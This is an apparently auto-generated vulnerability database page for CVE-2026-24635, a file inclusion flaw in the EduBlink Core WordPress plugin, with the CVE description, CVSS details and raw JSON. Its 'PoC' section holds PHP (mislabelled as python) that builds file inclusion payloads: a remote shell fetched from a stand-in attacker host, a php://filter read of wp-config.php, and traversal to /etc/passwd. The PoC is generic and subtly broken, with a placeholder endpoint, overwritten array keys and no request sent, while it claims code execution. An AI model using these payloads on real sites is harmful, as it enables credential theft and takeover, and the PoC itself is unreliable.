Security Vulnerability Report
中文
CVE-2026-24635 CVSS 7.5 HIGH

CVE-2026-24635

Published: 2026-01-23 15:16:23
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DevsBlink EduBlink Core edublink-core allows PHP Local File Inclusion.This issue affects EduBlink Core: from n/a through <= 2.0.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

EduBlink Core <= 2.0.7 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2026-24635 PoC - EduBlink Core Remote File Inclusion * Target: EduBlink Core WordPress Plugin <= 2.0.7 * Type: Remote/Local File Inclusion * Author: Security Researcher * Reference: https://patchstack.com/database/Wordpress/Plugin/edublink-core */ // Target URL configuration $target_url = 'http://target-wordpress-site.com'; $plugin_path = '/wp-content/plugins/edublink-core/'; // Method 1: Remote File Inclusion (if allow_url_include is enabled) $rfi_payload = array( 'file' => 'http://attacker-server.com/shell.txt', // or using PHP wrapper 'file' => 'php://filter/convert.base64-encode/resource=wp-config.php' ); // Method 2: Local File Inclusion with path traversal $lfi_payload = array( 'file' => '../../../../../../../../etc/passwd', 'file' => '../../../../../../wp-config.php' ); // Construct malicious request $vulnerable_endpoint = $target_url . $plugin_path . 'includes/any-vulnerable-file.php'; echo "[*] CVE-2026-24635 PoC\n"; echo "[*] Target: $target_url\n"; echo "[*] Testing Remote File Inclusion...\n"; // Note: Modify the endpoint based on actual vulnerable file // Common patterns in EduBlink: // ?file=../../config.php // ?page=some-template.php // ?module=../uploads/shell.php // For demonstration, showing the attack vector structure $attack_url = $vulnerable_endpoint . '?' . http_build_query($rfi_payload); echo "[+] Attack URL: $attack_url\n"; echo "[+] If successful, remote PHP code will be executed.\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24635", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:23.363", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DevsBlink EduBlink Core edublink-core allows PHP Local File Inclusion.This issue affects EduBlink Core: from n/a through <= 2.0.7."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP, la vulnerabilidad de 'inclusión remota de ficheros PHP' en DevsBlink EduBlink Core edublink-core permite la inclusión local de ficheros PHP. Este problema afecta a EduBlink Core: desde n/a hasta &lt;= 2.0.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/edublink-core/vulnerability/wordpress-edublink-core-plugin-2-0-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}